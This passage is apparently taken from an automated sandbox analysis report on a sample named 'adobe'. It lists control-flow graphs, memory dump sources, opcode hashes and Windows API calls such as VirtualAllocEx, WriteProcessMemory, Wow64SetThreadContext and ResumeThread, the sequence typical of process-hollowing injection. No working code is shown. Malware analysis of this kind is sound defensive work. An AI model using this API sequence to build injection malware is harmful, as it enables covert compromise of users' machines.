                        control_flow_graph 561 149ada8-149adb7 562 149adb9-149adc6 call 149a0cc 561->562 563 149ade3-149ade7 561->563 570 149adc8 562->570 571 149addc 562->571 564 149ade9-149adf3 563->564 565 149adfb-149ae3c 563->565 564->565 572 149ae49-149ae57 565->572 573 149ae3e-149ae46 565->573 619 149adce call 149b031 570->619 620 149adce call 149b040 570->620 571->563 574 149ae59-149ae5e 572->574 575 149ae7b-149ae7d 572->575 573->572 577 149ae69 574->577 578 149ae60-149ae67 call 149a0d8 574->578 579 149ae80-149ae87 575->579 576 149add4-149add6 576->571 580 149af18-149af92 576->580 581 149ae6b-149ae79 577->581 578->581 583 149ae89-149ae91 579->583 584 149ae94-149ae9b 579->584 611 149af94 580->611 612 149af96-149afbe 580->612 581->579 583->584 585 149aea8-149aeaa call 149a0e8 584->585 586 149ae9d-149aea5 584->586 591 149aeaf-149aeb1 585->591 586->585 592 149aebe-149aec3 591->592 593 149aeb3-149aebb 591->593 595 149aee1-149aeee 592->595 596 149aec5-149aecc 592->596 593->592 601 149af11-149af17 595->601 602 149aef0-149af0e 595->602 596->595 597 149aece-149aede call 149a0f8 call 149a108 596->597 597->595 602->601 611->612 613 149afc0-149afd8 611->613 612->613 614 149afda-149afdd 613->614 615 149afe0-149b00b GetModuleHandleW 613->615 614->615 616 149b00d-149b013 615->616 617 149b014-149b028 615->617 616->617 619->576 620->576
                        APIs
                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0149AFFE
                        Memory Dump Source
                        • Source File: 00000003.00000002.1789241828.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_1490000_adobe.jbxd
                        Similarity
                        • API ID: HandleModule
                        • String ID:
                        • API String ID: 4139908857-0
                        • Opcode ID: 00fe7e52545aac243db4aa2081e20a69cbec631145180f6b43e275951e4f5395
                        • Instruction ID: f5eee3e0686888a96c59b6b6d379596a2ef94dd0ff4105212e45aea022c4e7ea
                        • Opcode Fuzzy Hash: 00fe7e52545aac243db4aa2081e20a69cbec631145180f6b43e275951e4f5395
                        • Instruction Fuzzy Hash: 7D8137B0A00B058FDB24DF2AD05475ABBF1FF88214F108A2ED186D7B65D775E849CB90

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 729 1495a84-1495b14
                        Memory Dump Source
                        • Source File: 00000003.00000002.1789241828.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_1490000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fffae8d982e6cb58c664f3e44515fa451b9b56f14dff6aa210866f78f3733b0f
                        • Instruction ID: 01d53afb4c3f8bfb514ee8d38913dedbb9c7b682756987d7932687c2019a75f5
                        • Opcode Fuzzy Hash: fffae8d982e6cb58c664f3e44515fa451b9b56f14dff6aa210866f78f3733b0f
                        • Instruction Fuzzy Hash: 8C418C71805249CEDF12CFA8C8446AEBFB4AF46324F24808BC045AF266D779594ACF51

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 732 149590d-149590e 733 1495910 732->733 734 1495912 732->734 733->734 735 1495913-1495915 734->735 736 1495916-149598c 734->736 735->736 738 149598f-14959d9 CreateActCtxA 736->738 740 14959db-14959e1 738->740 741 14959e2-1495a3c 738->741 740->741 749 1495a4b-1495a4f 741->749 750 1495a3e-1495a41 741->750 751 1495a51-1495a5d 749->751 752 1495a60 749->752 750->749 751->752 754 1495a61 752->754 754->754
                        APIs
                        • CreateActCtxA.KERNEL32(?), ref: 014959C9
                        Memory Dump Source
                        • Source File: 00000003.00000002.1789241828.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_1490000_adobe.jbxd
                        Similarity
                        • API ID: Create
                        • String ID:
                        • API String ID: 2289755597-0
                        • Opcode ID: c3c637f693f0d143d52ea707dd6d3e8bb3f87f820c2f858a44e6e255ab999dd3
                        • Instruction ID: 0b703f2558f1914cc957c9d080e4fa488565245f2a6b57d8233b08460e11326d
                        • Opcode Fuzzy Hash: c3c637f693f0d143d52ea707dd6d3e8bb3f87f820c2f858a44e6e255ab999dd3
                        • Instruction Fuzzy Hash: E241E1B0C00719CFDF25DFAAC884B9EBBB5BF49304F24806AD409AB265DB756945CF90

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 755 14944c4-14959d9 CreateActCtxA 759 14959db-14959e1 755->759 760 14959e2-1495a3c 755->760 759->760 768 1495a4b-1495a4f 760->768 769 1495a3e-1495a41 760->769 770 1495a51-1495a5d 768->770 771 1495a60 768->771 769->768 770->771 773 1495a61 771->773 773->773
                        APIs
                        • CreateActCtxA.KERNEL32(?), ref: 014959C9
                        Memory Dump Source
                        • Source File: 00000003.00000002.1789241828.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_1490000_adobe.jbxd
                        Similarity
                        • API ID: Create
                        • String ID:
                        • API String ID: 2289755597-0
                        • Opcode ID: 067fde902d1bfa33c2db7a664b6113c56f1beb803f21d5aeb781163e47d59d9e
                        • Instruction ID: 81e46427ee597a9d7c34b77f593261e8e77454d7233388a9677da95eb609d491
                        • Opcode Fuzzy Hash: 067fde902d1bfa33c2db7a664b6113c56f1beb803f21d5aeb781163e47d59d9e
                        • Instruction Fuzzy Hash: 9241AFB0C00719CBDB25DFAAC884B9EBBB5BF49304F24806AD409AB265DB756945CF90

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 774 4ea95aa-4ea95ad 775 4ea95b0-4ea95b3 774->775 776 4ea95b4-4ea95fe 774->776 775->776 778 4ea960e-4ea964d WriteProcessMemory 776->778 779 4ea9600-4ea960c 776->779 781 4ea964f-4ea9655 778->781 782 4ea9656-4ea9686 778->782 779->778 781->782
                        APIs
                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04EA9640
                        Memory Dump Source
                        • Source File: 00000003.00000002.1793424398.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_4ea0000_adobe.jbxd
                        Similarity
                        • API ID: MemoryProcessWrite
                        • String ID:
                        • API String ID: 3559483778-0
                        • Opcode ID: 4658d946435b38855cc7bdc174cf1bd333fc779f167e0e111029a30df744b9bf
                        • Instruction ID: cef72d3b7bcea2890c8ca643e20a033b0b4bd859789a54b91613cdbbda35db3e
                        • Opcode Fuzzy Hash: 4658d946435b38855cc7bdc174cf1bd333fc779f167e0e111029a30df744b9bf
                        • Instruction Fuzzy Hash: B92148B19003599FDB10CFA9C885BDEBFF4FF88314F108829E959A7251C778A954CBA4

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 786 4ea95b0-4ea95fe 789 4ea960e-4ea964d WriteProcessMemory 786->789 790 4ea9600-4ea960c 786->790 792 4ea964f-4ea9655 789->792 793 4ea9656-4ea9686 789->793 790->789 792->793
                        APIs
                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04EA9640
                        Memory Dump Source
                        • Source File: 00000003.00000002.1793424398.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_4ea0000_adobe.jbxd
                        Similarity
                        • API ID: MemoryProcessWrite
                        • String ID:
                        • API String ID: 3559483778-0
                        • Opcode ID: d7d7ee53b2e3a3d617c0dbd9b84d78de285067da813460bfe38f99184439d85c
                        • Instruction ID: eb2e930b04a001bbe7fa185e8b82b481cd51e86c32e6781342242dfb43ead97e
                        • Opcode Fuzzy Hash: d7d7ee53b2e3a3d617c0dbd9b84d78de285067da813460bfe38f99184439d85c
                        • Instruction Fuzzy Hash: 9D212AB19003599FCB10CFA9C885BDEBBF5FF88314F148829E558A7251C774A554CBA4
                        APIs
                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 04EA905E
                        Memory Dump Source
                        • Source File: 00000003.00000002.1793424398.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_4ea0000_adobe.jbxd
                        Similarity
                        • API ID: ContextThreadWow64
                        • String ID:
                        • API String ID: 983334009-0
                        • Opcode ID: bc5307d2cbef8a6b93bacaff02f098893b7dd91987d0a31dacd60061c745e2d2
                        • Instruction ID: cbe002e90fe49bc2cb2deb9d3fe873b466983f6ca48d7d1e52c2a0fd575b78ba
                        • Opcode Fuzzy Hash: bc5307d2cbef8a6b93bacaff02f098893b7dd91987d0a31dacd60061c745e2d2
                        • Instruction Fuzzy Hash: 562137B19002098FDB10DFAAC4857EEBFF4EF88364F10842AD559A7241D778A945CFA5
                        APIs
                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04EA9720
                        Memory Dump Source
                        • Source File: 00000003.00000002.1793424398.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_4ea0000_adobe.jbxd
                        Similarity
                        • API ID: MemoryProcessRead
                        • String ID:
                        • API String ID: 1726664587-0
                        • Opcode ID: d5a5fa6e15d81ba41e6ea08ff61e0441f326289f41633912cf5ab44467e031de
                        • Instruction ID: 384d9a66950d96d4ac2d5ef32f2b9a0e08d17b4cdaf5bff40fd059797fd7890d
                        • Opcode Fuzzy Hash: d5a5fa6e15d81ba41e6ea08ff61e0441f326289f41633912cf5ab44467e031de
                        • Instruction Fuzzy Hash: 922148B18002499FCB10DFAAC885ADEFBF4FF48324F508829E558A7251C738A955CBA4
                        APIs
                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04EA9720
                        Memory Dump Source
                        • Source File: 00000003.00000002.1793424398.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_4ea0000_adobe.jbxd
                        Similarity
                        • API ID: MemoryProcessRead
                        • String ID:
                        • API String ID: 1726664587-0
                        • Opcode ID: fd1491d1c3503575948e2e52e973ccac0d7f6b437a67d19c4880141b92b2c244
                        • Instruction ID: 42e851dfbbfd7baaca7e83640663155061cf3c38659d6ab1267b88dad8907567
                        • Opcode Fuzzy Hash: fd1491d1c3503575948e2e52e973ccac0d7f6b437a67d19c4880141b92b2c244
                        • Instruction Fuzzy Hash: C52139B1C003599FCB10DFAAC885ADEFBF5FF48310F108429E558A7250C774A954CBA5
                        APIs
                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 04EA905E
                        Memory Dump Source
                        • Source File: 00000003.00000002.1793424398.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_4ea0000_adobe.jbxd
                        Similarity
                        • API ID: ContextThreadWow64
                        • String ID:
                        • API String ID: 983334009-0
                        • Opcode ID: b367829cda74ec7c0d41c2de45ad066ab2717c45bb0b2600842a962f4e256974
                        • Instruction ID: 6334aa1c148d6ce7f019823b1d9f9a0946fa5d611f52f18f4dffddbb77c331fc
                        • Opcode Fuzzy Hash: b367829cda74ec7c0d41c2de45ad066ab2717c45bb0b2600842a962f4e256974
                        • Instruction Fuzzy Hash: 482149B19003098FDB10DFAAC4857EEBBF4EF48364F10C42AD559A7241C778A945CFA5
                        APIs
                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0149D717
                        Memory Dump Source
                        • Source File: 00000003.00000002.1789241828.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_1490000_adobe.jbxd
                        Similarity
                        • API ID: DuplicateHandle
                        • String ID:
                        • API String ID: 3793708945-0
                        • Opcode ID: fc847a5c8aacd29051a27e7bb1583b40861fa9b6e493c72e527125ea548f5d88
                        • Instruction ID: 2fc4711c69f5cb3f165f7110a524e1dfac6320ac37635580eccee4ba4396b19b
                        • Opcode Fuzzy Hash: fc847a5c8aacd29051a27e7bb1583b40861fa9b6e493c72e527125ea548f5d88
                        • Instruction Fuzzy Hash: 6F21E2B5D002489FDB10CFAAD984ADEBFF8EB48320F14805AE918A3310D374A944CFA4
                        APIs
                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0149D717
                        Memory Dump Source
                        • Source File: 00000003.00000002.1789241828.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_1490000_adobe.jbxd
                        Similarity
                        • API ID: DuplicateHandle
                        • String ID:
                        • API String ID: 3793708945-0
                        • Opcode ID: 1bbcfded653922c5f4f9ccc85811a59a307b1bde41e6f9a450dcd3bc30649886
                        • Instruction ID: 4f8046723086b704c2c268e3af60694df1a6f23535e83ce1d1f0d56f457d2aa1
                        • Opcode Fuzzy Hash: 1bbcfded653922c5f4f9ccc85811a59a307b1bde41e6f9a450dcd3bc30649886
                        • Instruction Fuzzy Hash: B421E0B5D002589FDB10CFA9D584AEEBFF4EB48314F14845AE918A3310D374A944CFA4
                        APIs
                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04EA955E
                        Memory Dump Source
                        • Source File: 00000003.00000002.1793424398.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_4ea0000_adobe.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: fbb118e7de48b00a1429f1bcda913307513e76bf3701529aa1cda3570fd04bed
                        • Instruction ID: b58aaf72678d8c25ca7936cfbdca114f52537daff66baffd7cc74fb9fc33bb22
                        • Opcode Fuzzy Hash: fbb118e7de48b00a1429f1bcda913307513e76bf3701529aa1cda3570fd04bed
                        • Instruction Fuzzy Hash: F31189B18002499FCB10CFAAC845BDFBFF5EF88324F208819E515A7250C735A554CFA4
                        APIs
                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0149B079,00000800,00000000,00000000), ref: 0149B28A
                        Memory Dump Source
                        • Source File: 00000003.00000002.1789241828.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_1490000_adobe.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: de7200f6891ec67f528587868406b8ba91686845e18e4b8813f35e842ba345d3
                        • Instruction ID: d0b1198eca832243634f961fb7cba1cfb7fc5065784ba7f2a1f2c68224adc8ec
                        • Opcode Fuzzy Hash: de7200f6891ec67f528587868406b8ba91686845e18e4b8813f35e842ba345d3
                        • Instruction Fuzzy Hash: 8A1100B69002098FDB20CF9AD448A9EFFF4EB88310F10846AE519A7220C375A545CFA4
                        APIs
                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0149B079,00000800,00000000,00000000), ref: 0149B28A
                        Memory Dump Source
                        • Source File: 00000003.00000002.1789241828.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_1490000_adobe.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: 72df0ca46d6999c6ba5e1a06a3af56abd18ec7eeee32632ee99175a0488d4045
                        • Instruction ID: 150b96fce58cdadb0cbe23de6047816433ec3d2d8d3375291ca227c5f9ba2b03
                        • Opcode Fuzzy Hash: 72df0ca46d6999c6ba5e1a06a3af56abd18ec7eeee32632ee99175a0488d4045
                        • Instruction Fuzzy Hash: 222112B69002488FDB20CF9AD948ADEFFF4EB48314F14846ED559AB310C375A545CFA4
                        APIs
                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04EA955E
                        Memory Dump Source
                        • Source File: 00000003.00000002.1793424398.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_4ea0000_adobe.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: d3aa5e3878eeccb8c78586750f78e344e6f818214f515a3a429c8916ec378fff
                        • Instruction ID: 8aea02e25aa438bcb15c1b4eec0773625ec27a2be46967561239710b660595c8
                        • Opcode Fuzzy Hash: d3aa5e3878eeccb8c78586750f78e344e6f818214f515a3a429c8916ec378fff
                        • Instruction Fuzzy Hash: 561167B18002488FCB10DFAAC845BDFBFF5EF88324F108819E519A7250C735A554CFA0
                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.1793424398.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_4ea0000_adobe.jbxd
                        Similarity
                        • API ID: ResumeThread
                        • String ID:
                        • API String ID: 947044025-0
                        • Opcode ID: 110781db3b6ab92518eaa04b5d2cbea5a2ad22312c83ba6d020d6465dbe6ba52
                        • Instruction ID: 47856324f545036a64ce6a6e5d102a852b2567876264f7ed41c23ab3e3be5ff5
                        • Opcode Fuzzy Hash: 110781db3b6ab92518eaa04b5d2cbea5a2ad22312c83ba6d020d6465dbe6ba52
                        • Instruction Fuzzy Hash: 281185B18002498FDB20DFAAC4457DEFFF5EF98324F208429D119A7240CB38A944CBA4
                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.1793424398.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_4ea0000_adobe.jbxd
                        Similarity
                        • API ID: ResumeThread
                        • String ID:
                        • API String ID: 947044025-0
                        • Opcode ID: 6d3cc55830e4a75cfa9b219042c24d4109af716e0b8bfe02865b12e5ed9e0e22
                        • Instruction ID: 27cf78669710b67e570c8ff88e0ad2a6e3fba6ead0107a40ba2da305cce05eb7
                        • Opcode Fuzzy Hash: 6d3cc55830e4a75cfa9b219042c24d4109af716e0b8bfe02865b12e5ed9e0e22
                        • Instruction Fuzzy Hash: DE1166B19002498FCB20DFAAC4457DEFBF5EF88324F208429D519A7240CB74A944CFA4
                        APIs
                        • FindCloseChangeNotification.KERNELBASE(?), ref: 04EAD870
                        Memory Dump Source
                        • Source File: 00000003.00000002.1793424398.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_4ea0000_adobe.jbxd
                        Similarity
                        • API ID: ChangeCloseFindNotification
                        • String ID:
                        • API String ID: 2591292051-0
                        • Opcode ID: 6cbbd4513ce051fbcdb6e1d99a8af24f888b878fc8fd24a7e187cea2243a4329
                        • Instruction ID: 99267196f4c0b024902a8584d237cb87d45da5af60f5986edce9434455aaaad2
                        • Opcode Fuzzy Hash: 6cbbd4513ce051fbcdb6e1d99a8af24f888b878fc8fd24a7e187cea2243a4329
                        • Instruction Fuzzy Hash: 381133B1800249CFDB20DF99C449BDEBBF4EB48324F10846AD568A7750D738A684CFA5
                        APIs
                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 04EABB5D
                        Memory Dump Source
                        • Source File: 00000003.00000002.1793424398.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_4ea0000_adobe.jbxd
                        Similarity
                        • API ID: MessagePost
                        • String ID:
                        • API String ID: 410705778-0
                        • Opcode ID: 03f96d8e256171a56d6731d156518dd9e384d3f5e7e550a25f667a4e6f55bb03
                        • Instruction ID: 4a1d53191d8f0a79307d65d19a3f0d3b42d81fa727be7dd22d7c3c8c75e677ac
                        • Opcode Fuzzy Hash: 03f96d8e256171a56d6731d156518dd9e384d3f5e7e550a25f667a4e6f55bb03
                        • Instruction Fuzzy Hash: CD11F2B58003489FDB10DF9AC885BDEFFF8EB49324F10845AE559A7250C375A688CFA5
                        APIs
                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0149AFFE
                        Memory Dump Source
                        • Source File: 00000003.00000002.1789241828.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_1490000_adobe.jbxd
                        Similarity
                        • API ID: HandleModule
                        • String ID:
                        • API String ID: 4139908857-0
                        • Opcode ID: 8421f3c93629e761bc727932ff53795548e59efb1c6770b700dea32b201d4c5b
                        • Instruction ID: 8a944957ea2ab5f7e9cbadbc8685cb950b21407f0aaab94c867b77ea5c0f4279
                        • Opcode Fuzzy Hash: 8421f3c93629e761bc727932ff53795548e59efb1c6770b700dea32b201d4c5b
                        • Instruction Fuzzy Hash: CA1110B6C002498FDB20CF9AD444ADEFFF4EB88324F10842AD528A7310D375A545CFA1
                        APIs
                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 04EABB5D
                        Memory Dump Source
                        • Source File: 00000003.00000002.1793424398.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_4ea0000_adobe.jbxd
                        Similarity
                        • API ID: MessagePost
                        • String ID:
                        • API String ID: 410705778-0
                        • Opcode ID: e85d92860589de2ff55520778f2ab77ebb7c8dcdcfbe9bfa3a6f0bcbf4e3692c
                        • Instruction ID: b7f89843fc3187cd503ac470b0d4b6aa72c0a2606bda8b4def7611ff03b946ad
                        • Opcode Fuzzy Hash: e85d92860589de2ff55520778f2ab77ebb7c8dcdcfbe9bfa3a6f0bcbf4e3692c
                        • Instruction Fuzzy Hash: A711F5B5800348DFDB10DF99C445BDEBBF8EB48314F108459E559A7201D375B954CFA5
                        APIs
                        • FindCloseChangeNotification.KERNELBASE(?), ref: 04EAD870
                        Memory Dump Source
                        • Source File: 00000003.00000002.1793424398.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_4ea0000_adobe.jbxd
                        Similarity
                        • API ID: ChangeCloseFindNotification
                        • String ID:
                        • API String ID: 2591292051-0
                        • Opcode ID: 1a45633a97684174b37428fb5e387a054326a7b2a1784d72866dc92462485921
                        • Instruction ID: b37e73887cceab35cec1c30e7258f27155cf4b2df147e132de973c80eba64aab
                        • Opcode Fuzzy Hash: 1a45633a97684174b37428fb5e387a054326a7b2a1784d72866dc92462485921
                        • Instruction Fuzzy Hash: B21115B5800349CFDB20DF9AC545BDEBBF4EB48324F10846AD558A7750D738A544CFA5
                        Memory Dump Source
                        • Source File: 00000003.00000002.1787568577.000000000111D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0111D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_111d000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5d917aa71860c33ea6d6d0c7a9528ed326b40d5823e5399dd42fe6b9c6d414dc
                        • Instruction ID: 9f8b1801dbc7bb1732550f60486e96ffd89bae4e5737f607a0f682b48c588120
                        • Opcode Fuzzy Hash: 5d917aa71860c33ea6d6d0c7a9528ed326b40d5823e5399dd42fe6b9c6d414dc
                        • Instruction Fuzzy Hash: A0212471140200DFDF09DF48E9C8B56FF65FB88314F20C179E9090BA5AC336E446C6A2
                        Memory Dump Source
                        • Source File: 00000003.00000002.1787568577.000000000111D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0111D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_111d000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a3baddf223a71e64185cb28c485d589a6906d765cbc637b3af5cb76ec603681f
                        • Instruction ID: f156c4bd820f068a1bb14d60db79693935fe4d55e5e9aa1d32a30c92129a5a8a
                        • Opcode Fuzzy Hash: a3baddf223a71e64185cb28c485d589a6906d765cbc637b3af5cb76ec603681f
                        • Instruction Fuzzy Hash: 3121FF71500240DFDF09DF58E9C8B2AFFB5FB88318F20C579E9094A25AC336D456CAA2
                        Memory Dump Source
                        • Source File: 00000003.00000002.1787648279.000000000112D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0112D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_112d000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b599545cd4a787f857532e5d2388bfdb5caf0da5cf3bfc94eaa54a02d18fddfc
                        • Instruction ID: 8b2ec79ee4e7225645912bd3409063eedc246009ffd385e72d4695f9453ba285
                        • Opcode Fuzzy Hash: b599545cd4a787f857532e5d2388bfdb5caf0da5cf3bfc94eaa54a02d18fddfc
                        • Instruction Fuzzy Hash: 7C212671504200EFDF09DF98E9C4B26BBA5FB85324F20C66DE9094B256C336D466CA62
                        Memory Dump Source
                        • Source File: 00000003.00000002.1787648279.000000000112D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0112D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_112d000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 187623f4c8564f8c7102393d0e00f1cead3d15d7db3b8c0c3d18b1567f0ba7a7
                        • Instruction ID: fd7b288ab1d91738504de3cf9598dc586175c9e656378a01af20d3c1e546995c
                        • Opcode Fuzzy Hash: 187623f4c8564f8c7102393d0e00f1cead3d15d7db3b8c0c3d18b1567f0ba7a7
                        • Instruction Fuzzy Hash: F9212271604240DFCF19DF58E984B26BFA5EB84314F20C56DD90A4B2A6C33AD467CA66
                        Memory Dump Source
                        • Source File: 00000003.00000002.1787648279.000000000112D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0112D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_112d000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9047bda74e314c9ab0ff69d28973de17d0cefb9a81c82d4bd7df43cd6f150218
                        • Instruction ID: 2a4fd6fa5e4e8afcbbc0624264557ee546fb4f5a8974df914ac71679d0cd69cd
                        • Opcode Fuzzy Hash: 9047bda74e314c9ab0ff69d28973de17d0cefb9a81c82d4bd7df43cd6f150218
                        • Instruction Fuzzy Hash: 9F2192755083809FCB07CF64D994715BF71EF46214F28C5DAD8498F2A7C33A981ACB62
                        Memory Dump Source
                        • Source File: 00000003.00000002.1787568577.000000000111D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0111D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_111d000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                        • Instruction ID: 7bcf6bf1eb8d25c227950939532b585f0b99e93b61dd7069cf9ca0e9f6d1bb91
                        • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                        • Instruction Fuzzy Hash: 8C11CD72444240CFDF16CF44D5C4B56BF61FB94224F24C6A9D9090AA5AC33AE45ACBA2
                        Memory Dump Source
                        • Source File: 00000003.00000002.1787568577.000000000111D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0111D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_111d000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                        • Instruction ID: 4624a3e11074433164d26a6e683afedcc83c1dc1296f51d5a73fcd97fbb42c35
                        • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                        • Instruction Fuzzy Hash: FD119D76504280CFDF16CF54E5C4B16BF71FB84218F24C6A9D9490B65AC336D45ACBA2
                        Memory Dump Source
                        • Source File: 00000003.00000002.1787648279.000000000112D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0112D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_112d000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                        • Instruction ID: 723a178fc2b5708d3809242ad7b7870cd4c6684d0ae46f9891e498334b99251c
                        • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
